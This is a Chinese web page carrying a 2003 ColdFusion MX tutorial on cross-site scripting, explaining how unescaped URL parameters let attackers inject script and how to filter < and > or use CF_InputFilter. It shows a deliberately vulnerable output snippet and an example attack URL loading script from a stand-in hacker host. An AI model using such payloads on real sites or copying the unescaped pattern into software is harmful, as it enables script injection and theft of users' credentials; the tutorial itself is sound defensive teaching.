中文字幕二区_国产精品免费在线观看_黄色网站观看_人人草人人澡_日本真实娇小xxxx

您的位置: 首頁(yè) > 技術(shù)文檔 > 網(wǎng)絡(luò)編程 > Coldfusion MX技巧精華收集(2)
多層企業(yè)應(yīng)用:J2EE應(yīng)用服務(wù)器 回到列表 Coldfusion MX技巧精華收集(1)
 Coldfusion MX技巧精華收集(2)

作者:整理 時(shí)間: 2003-04-27 文檔類型:原創(chuàng) 來(lái)自:

第 1 頁(yè) Coldfusion MX技巧精華收集(2)
第 2 頁(yè) 使用自訂卷標(biāo)來(lái)設(shè)定版面配置
第 3 頁(yè) 保護(hù)頁(yè)面不受跨網(wǎng)站(cross-site)程序攻擊
第 4 頁(yè) 使用 Fusebox
第 5 頁(yè) 新增站臺(tái)與setDefaultGatewayUrl()?
第 6 頁(yè) Flash Communication Server相關(guān)

保護(hù)頁(yè)面不受跨網(wǎng)站(cross-site)程序攻擊
作者: Kyle 2/16/03

內(nèi)容:

保護(hù)頁(yè)面不受跨網(wǎng)站(cross-site)程序攻擊
跨網(wǎng)站程序攻擊是網(wǎng)站管理人員經(jīng)常必須面對(duì)的安全性問(wèn)題之一。像是 ASP,CFML 或者 PHP 這類的應(yīng)用程序服務(wù)器,由于它們與生俱來(lái)的動(dòng)態(tài)功能特性,使得它們特別容易受到這一類的攻擊。很多時(shí)候你的程序都會(huì)把某些信息從某個(gè)頁(yè)面?zhèn)魉偷搅硪粋(gè)頁(yè)面,將資料儲(chǔ)存到數(shù)據(jù)庫(kù)中,或者將窗體或 URL 參數(shù)接收到的變量值顯示在頁(yè)面上。雖然能夠在不同頁(yè)面之間傳遞資料看起來(lái)是一個(gè)優(yōu)點(diǎn),但是如果你不夠小心的話,這項(xiàng)特性也會(huì)同時(shí)帶來(lái)嚴(yán)重的安全性問(wèn)題。舉例來(lái)說(shuō),請(qǐng)看看下面這個(gè)超鏈接以及相對(duì)應(yīng)的目標(biāo)頁(yè)面顯示的結(jié)果:

<!--- 下面是你某個(gè)頁(yè)面中的超鏈接 --->
<A HREF="nextpage.cfm?username=Brian">請(qǐng)按這里</A>
<!--- 下面是 nextpage.cfm 所顯示的內(nèi)容 --->
<CFOUTPUT>
歡迎來(lái)到下一頁(yè),#URL.UserName#。
</CFOUTPUT>

看起來(lái)夠簡(jiǎn)單了吧?上面這個(gè)超級(jí)鏈接純粹把使用者名稱從一個(gè)頁(yè)面?zhèn)鬟f到另一個(gè)頁(yè)面去(nextpage.cfm),如果你不夠小心的話,這正是問(wèn)題可能發(fā)生的地方?缇W(wǎng)站程序(cross-site scripting)基本上便是欺騙你的 Web 服務(wù)器,讓它在未預(yù)期的的情況下執(zhí)行其它網(wǎng)站上面的程序,JavaScript,Java applet 或者 ActiveX 控件。

如果你觀察上面這個(gè)例子的目標(biāo)頁(yè)面的 URL,它看起來(lái)會(huì)是下面這樣:

http://www.mysite.com/nextpage.cfm?username=Brian
某位不懷好意的使用者可以自己輸入一個(gè) URL,里面包含一個(gè)連向另一部服務(wù)器上面的程序的連結(jié),就像下面這樣:

http://www.mysite.com/nextpage.cfm?username=<script src="http://www.hackersite.com/nastyscript.js">
當(dāng) ColdFusion 在下一個(gè)頁(yè)面輸出上面的 URL 所傳過(guò)來(lái)的變量的時(shí)候,輸出結(jié)果看起來(lái)變成下面這樣:

歡迎來(lái)到下一頁(yè),<script src="http://www.hackersite.com/nastyscript.js">。
這個(gè)變量會(huì)讓你那無(wú)辜的頁(yè)面在你未預(yù)期的狀況下執(zhí)行對(duì)方指定的 JavaScript 程序代碼。利用類似的方式,對(duì)方也可以在 URL 里面指定惡意的 ActiveX 控件或者 JavaApplet。當(dāng)然,在這個(gè)例子里面,使用者僅是在瀏覽器上面執(zhí)行他們自己指定的程序而已,但如果這些惡意程序代碼被你自己的程序不小心儲(chǔ)存起來(lái)并且之后又輸出到其它使用者的畫(huà)面上(例如搗亂者將某些 JavaScript 程序代碼輸入在你的討論區(qū)發(fā)表文章窗體里面,然后你的程序在不知情的狀況下把這些程序代碼當(dāng)成發(fā)言內(nèi)容的一部份存入數(shù)據(jù)庫(kù)中,那么其它使用者觀看到這篇文章的時(shí)候,那些被刻意放入的 JavaScript,Java Applet 或者 ActiveX 控件便會(huì)在其它使用者的瀏覽器上面執(zhí)行了),這時(shí)候那些程序就可能足以將其它使用者的帳號(hào),密碼或者其它敏感資料暗中傳送到某個(gè)地方去。這項(xiàng)安全性問(wèn)題并非 ColdFusion 才會(huì)發(fā)生的狀況,任何應(yīng)用程序服務(wù)器,只要它能夠接收從 URL 或者窗體傳送過(guò)來(lái)的資料并且顯示在使用者畫(huà)面上,都有可能受到這類攻擊。

幸運(yùn)的是,要避免這種狀況發(fā)生并不困難。你要做的工作是過(guò)濾來(lái)自 URL 或者窗體傳送過(guò)來(lái)的資料,并且將一些特殊的危險(xiǎn)字符,例如 < 或者 >(大于和小于符號(hào)),把他們替換成相對(duì)應(yīng)的 ASCII 字符碼形式(例如將 < 替換成 &lt;)就可以了。事實(shí)上 Allaire 公司提供了一個(gè) CF_InputFilter 自訂卷標(biāo),你可以將它用在你的 application.cfm 檔案里面,它可以替你處理相關(guān)的特殊字符過(guò)濾工作。如果你需要更完整的關(guān)于這項(xiàng)議題的資料,請(qǐng)參考「Allaire 安全問(wèn)題布告欄」網(wǎng)站上面的這篇文章(ASB00-05)。

出處:
責(zé)任編輯:藍(lán)色

上一頁(yè) 使用自訂卷標(biāo)來(lái)設(shè)定版面配置 下一頁(yè) 使用 Fusebox

◎進(jìn)入論壇網(wǎng)絡(luò)編程版塊參加討論

作者文章
Coldfusion MX技巧精華收集(1)
關(guān)鍵字搜索 常規(guī)搜索 推薦文檔
熱門(mén)搜索:CSS Fireworks 設(shè)計(jì)比賽 網(wǎng)頁(yè)制作 web標(biāo)準(zhǔn) 用戶體驗(yàn) UE photoshop Dreamweaver Studio8 Flash 手繪 CG
站點(diǎn)最新 站點(diǎn)最新列表
周大!熬•自然”設(shè)計(jì)大賽開(kāi)啟
國(guó)際體驗(yàn)設(shè)計(jì)大會(huì)7月將在京舉行
中國(guó)國(guó)防科技信息中心標(biāo)志征集
云計(jì)算如何讓安全問(wèn)題可控
云計(jì)算是多數(shù)企業(yè)唯一擁抱互聯(lián)網(wǎng)的機(jī)會(huì)
阿里行云
云手機(jī)年終巨獻(xiàn),送禮標(biāo)配299起
阿里巴巴CTO王堅(jiān)的"云和互聯(lián)網(wǎng)觀"
1499元買真八核 云OS雙蛋大促
首屆COCO桌面手機(jī)主題設(shè)計(jì)大賽
欄目最新 欄目最新列表
淺談JavaScript編程語(yǔ)言的編碼規(guī)范
如何在illustrator中繪制臺(tái)歷
Ps簡(jiǎn)單繪制一個(gè)可愛(ài)的鉛筆圖標(biāo)
數(shù)據(jù)同步算法研究
用ps作簡(jiǎn)單的作品展示頁(yè)面
CSS定位機(jī)制之一:普通流
25個(gè)最佳最閃亮的Eclipse開(kāi)發(fā)項(xiàng)目
Illustrator中制作針線縫制文字效果
Photoshop制作印刷凹凸字體
VS2010中創(chuàng)建自定義SQL Rule
>> 分頁(yè) 首頁(yè) 前頁(yè) 后頁(yè) 尾頁(yè) 頁(yè)次:3/6頁(yè) 1個(gè)記錄/頁(yè) 轉(zhuǎn)到 頁(yè) 共6個(gè)記錄

藍(lán)色理想版權(quán)申明:除部分特別聲明不要轉(zhuǎn)載,或者授權(quán)我站獨(dú)家播發(fā)的文章外,大家可以自由轉(zhuǎn)載我站點(diǎn)的原創(chuàng)文章,但原作者和來(lái)自我站的鏈接必須保留(非我站原創(chuàng)的,按照原來(lái)自一節(jié),自行鏈接)。文章版權(quán)歸我站和作者共有。

轉(zhuǎn)載要求:轉(zhuǎn)載之圖片、文件,鏈接請(qǐng)不要盜鏈到本站,且不準(zhǔn)打上各自站點(diǎn)的水印,亦不能抹去我站點(diǎn)水印。

特別注意:本站所提供的攝影照片,插畫(huà),設(shè)計(jì)作品,如需使用,請(qǐng)與原作者聯(lián)系,版權(quán)歸原作者所有,文章若有侵犯作者版權(quán),請(qǐng)與我們聯(lián)系,我們將立即刪除修改。

您的評(píng)論
用戶名:  口令:
說(shuō)明:輸入正確的用戶名和密碼才能參與評(píng)論。如果您不是本站會(huì)員,你可以注冊(cè) 為本站會(huì)員。
注意:文章中的鏈接、內(nèi)容等需要修改的錯(cuò)誤,請(qǐng)用報(bào)告錯(cuò)誤,以利文檔及時(shí)修改。
不評(píng)分 1 2 3 4 5
注意:請(qǐng)不要在評(píng)論中含與內(nèi)容無(wú)關(guān)的廣告鏈接,違者封ID
請(qǐng)您注意:
·不良評(píng)論請(qǐng)用報(bào)告管理員,以利管理員及時(shí)刪除。
·尊重網(wǎng)上道德,遵守中華人民共和國(guó)的各項(xiàng)有關(guān)法律法規(guī)
·承擔(dān)一切因您的行為而直接或間接導(dǎo)致的民事或刑事法律責(zé)任
·本站評(píng)論管理人員有權(quán)保留或刪除其管轄評(píng)論中的任意內(nèi)容
·您在本站發(fā)表的作品,本站有權(quán)在網(wǎng)站內(nèi)轉(zhuǎn)載或引用
·參與本評(píng)論即表明您已經(jīng)閱讀并接受上述條款
推薦文檔 | 打印文檔 | 評(píng)論文檔 | 報(bào)告錯(cuò)誤  
專業(yè)書(shū)推薦 更多內(nèi)容
網(wǎng)站可用性測(cè)試及優(yōu)化指南
《寫(xiě)給大家看的色彩書(shū)1》
《跟我去香港》
眾妙之門(mén)—網(wǎng)站UI 設(shè)計(jì)之道
《Flex 4.0 RIA開(kāi)發(fā)寶典》
《贏在設(shè)計(jì)》
犀利開(kāi)發(fā)—jQuery內(nèi)核詳解與實(shí)踐
作品集 更多內(nèi)容

雜⑦雜⑧ Gold NORMANA V2